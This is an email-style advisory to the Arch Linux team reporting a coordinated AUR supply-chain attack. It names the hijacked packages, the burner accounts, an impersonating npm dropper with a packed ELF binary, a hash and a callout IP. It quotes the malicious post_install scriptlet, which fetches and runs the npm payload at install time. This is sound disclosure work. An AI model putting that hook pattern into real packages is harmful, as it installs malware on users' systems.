Hi Arch Team, Flagging an active coordinated supply-chain attack against the AUR observed on 2026-05-16 / 2026-05-17. Three packages were adopted by three single-package burner accounts using @onionmail.org addresses, and the very first commit on each pushed an identical payload.
Hijacked packages and adopters AUR Package Adopter Email mod_python Arthur Nicolas [email protected] nss-hg Raphael David [email protected] multibootusb Francis Martin [email protected] Common payload Added to / inserted in each package's .install scriptlet: post_install() { cd /tmp npm install python-utils } Each PKGBUILD also gained a new depends=('npm') to make sure the npm binary is present at install time. Dropper The npm package [email protected], published on 2026-05-16 by generaltranslations <[email protected]> (impersonating the legitimate generaltranslation/gt org on GitHub, which actually publishes python-extractor, not python-utils), declares: "preinstall": "./dist/typecheck.js" in its package.json. That file is not JavaScript — it is a UPX-packed, statically-linked Linux x86-64 ELF executable, ~5.2 MB. * SHA-256: cafebcfe50f4d6ed218f4525f44b81654bf2df4ebb06918984b4257940d4fd5b * Strings include a hardcoded callout endpoint 207.90.194.2:443 which is a TOR exit. Best Regards, Soufiane Fariss [email protected]<mailto:[email protected]>
